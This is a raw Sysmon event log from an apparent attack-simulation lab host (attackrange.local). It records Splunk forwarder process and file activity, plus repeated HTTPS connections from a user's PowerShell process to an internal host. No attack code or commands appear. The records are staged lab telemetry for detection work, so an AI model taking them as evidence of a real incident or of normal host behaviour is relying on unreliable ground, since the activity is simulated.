Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127279Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:42.070{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127278Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:42.070{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127277Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:42.070{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127276Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:42.070{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127275Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:42.070{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-822A-613A-A796-03000000C801}2876C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035127274Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:42.070{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-822A-613A-A796-03000000C801}2876C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035127273Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:42.056{B81B27B7-822A-613A-A796-03000000C801}2876C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035127283Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:43.253{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=420B0D75D676B853291884392E68CFF4,SHA256=AA9B164E2B06AA63F21AE83A638F0D1D646B8C5E97518509D57AC5D0A0731F2F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127282Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:43.085{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D886F67C6490E109B1062C8B830B8649,SHA256=0E50FD3E2F4DD12F7EAD778B6FA02F51D357B90CEDC05A443E6B3D4D55353ACD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127285Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:44.736{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=5B96DED0268643D4B1DA65E45D06C864,SHA256=D2AB934E51BDC71CBB6A870A7DD3159CC15682DA38DE19C4954FAFDAEC0352E0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127284Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:44.268{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=81C9CD9BD1F6DF8353F0F019DA46DA42,SHA256=827329D9F7C0E9458D72225A9647247C3F064D86CAFA50FC04E7D4D54938F988,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127286Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:45.282{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1DB95209AAFB516FF89274A6E5E13A13,SHA256=95D75060C834BACF83A148ECF98383D2D7CAC7F4E968B54AF507C3C1852B9E7B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127289Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:46.309{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3D3DFA3AAE688776AE8A6D1167FDB2C1,SHA256=56B087829816EB849DD05F0BDE099E7C8325A58BD7C227F0BD482C8BF093725B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127288Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:10.377{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62006-false10.0.1.12-8000- 354300x800000000000000035127287Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:09.899{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62005-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035127290Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:47.311{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2D047217425239E93E1A0B1726218D0D,SHA256=FB321BB176E1B477320C0FFFE84E7C1A276CF20EE8D81C02DD2F7E2E7518C81C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127292Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:48.510{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=C62FD2CE51F5901A0EFEA1091C942B4E,SHA256=A6C1BD95D975010D432A395F90AA9172EB7394EBBCB87CBEC3B1B37CB6627C22,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127291Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:48.326{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D72D4946A5C6F27D010A55711293296B,SHA256=793F1F7DF9B9CEBE4F83B3DD556AA59B261F77D05C66F135EB8B88B250390EBE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127293Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:49.372{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A80ADEB218EF5E3754CF7D0503DC8C86,SHA256=B5A5906CAE43117D49A7759E34D66BC31B3DF2C1EA4D204F7BC043830E10E62E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127295Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:50.405{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4AE16358182C69368C92199CCA0CF828,SHA256=0CDF2DD3F215C2983D570968CF07494FA97B4B5CE33324F1EF4937CD7CA64033,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127294Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:13.920{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62007-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035127296Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:51.423{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E563899D0F8235C8C7D531F44F58B13B,SHA256=7D3896FF91A3243B6C7A4850AE18EC7224A58EFE98173BAA931CDB866541FAA8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127298Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:52.484{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=744B4F1315675F5EE688F9AA7B22B1F0,SHA256=4ED29E3AB21317CD35FD96D8B630EA80CE55D2C2E57E336AE9CB03B6C2D9821F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127297Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:16.265{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62008-false10.0.1.12-8000- 23542300x800000000000000035127300Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:53.783{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=B9B795D045AA1F71C3C6C00C8B78EB52,SHA256=271346A143BB12761A9062C7732BA032B8679E2C28D0441A8A78A7F877DC8775,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127299Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:53.503{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=03A1AB998B328885F092AE89F7949267,SHA256=E4E2202EC35A56702A1111B77FC4FF986A9FF0A6A8108AE64BCCC1D071F5AE0D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127301Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:54.504{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=103B864ED7D1F3983AD1EA2993CCE3DC,SHA256=B8B66A8B8BB2B2FE12DEFCD1C737ECBEE586C762180C1A563E7410AC70D2A945,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127303Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:55.535{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F464E5647ED0A67324E153F84EC936FD,SHA256=67266CEFAB0101982FA4A1EF77F3CFBD82D62633F3D881F41B4AF37C8C254A39,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127302Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:18.931{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62009-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035127304Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:56.549{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0FD820B7A0416FB0DBE27078D7A0CB2C,SHA256=488334977E313ABA83587E2BC306239C22F912B019978FD31889311876C723F3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127307Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:57.564{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4AC880A10B12928B4EAB9A520F6C994B,SHA256=EF3515655D470F44D68EE9B7872A2E613537588E0C2C3159932C485045C64026,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127306Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:22.296{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62010-false10.0.1.12-8000- 10341000x800000000000000035127305Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:57.196{B81B27B7-4012-611D-0D00-00000000C801}7924628C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035127308Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:58.597{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5CC75F11FBF6A738ED0C78C4CD11DB54,SHA256=B0C5643F55025FFD7A690AC93ACC5243A1ABDAD9FEAD835727661774DB4BEDC1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127311Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:59.963{B81B27B7-4013-611D-2700-00000000C801}2076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=9D45E1BDB6F237A6CF51FFC6A12E6130,SHA256=87EEE278CDF62B2B86AF9CB87BDB04BAFB10272CEA175D83979B0C43158C5AB9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127310Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:59.878{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=1E0B20E30798BD3D3800328904928CAE,SHA256=1E52CD6A495053A68E5EE1E70900821066EB26BE1C4B56A6780AC5DAFECEB825,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127309Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:59.615{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=24E31EB46657B565D704A9C6AB48D911,SHA256=AD7394C3ADECD9C8C1B6EC5D1F79131380A736649A38B4A29AD51D2CA98362C0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127316Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:00.900{B81B27B7-4013-611D-2700-00000000C801}2076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\fishbucket\splunk_private_db\snapshot.old\snap.datMD5=065600AD54F8B5A8209111E4DCFE8BD6,SHA256=4B6299A46B481C0D059E7D9E18D5F10B9281D591B8E4B47FCAD1FF94FBF14412,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127315Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:00.900{B81B27B7-4013-611D-2700-00000000C801}2076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\fishbucket\splunk_private_db\snapshot.old\btree_records.datMD5=A64B7D19500238998DCB5B96D4A2E5A4,SHA256=87094B863F9C65D58368F12CF87D61D6A499FA579287CF39C0972FBB1558AEE1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127314Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:00.900{B81B27B7-4013-611D-2700-00000000C801}2076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\fishbucket\splunk_private_db\snapshot.old\btree_index.datMD5=234EA1B13F068E5B7785D0C84436D169,SHA256=0BF0C5FD12B0D9F3C6F9A780B3C0D069B1218CF9768782E7E29D3322D9AC2546,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127313Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:00.616{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C3CBC37BC032064A09DDD9BC7999389,SHA256=49A2C8B1725C3B4FECB5399FB39EF96E4B753E0747237E5A1BBB1F4F9980FA15,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127312Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:24.941{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62011-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035127317Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:01.631{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F043D35DFB35C312FBE457155048FEDD,SHA256=521A9A89741F2DC17F6CF9304687EDEBDDE2C32C365DF883445CD14606030AD9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127319Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:02.677{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FEB22CE4316B5861C23190C6FD255C3E,SHA256=4F74926FF5CB2A4C0151E4106D0A045F2D21815E84475033CEB5827DB0547D79,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127318Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:26.126{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62012-false10.0.1.12-8089- 23542300x800000000000000035127320Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:03.695{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 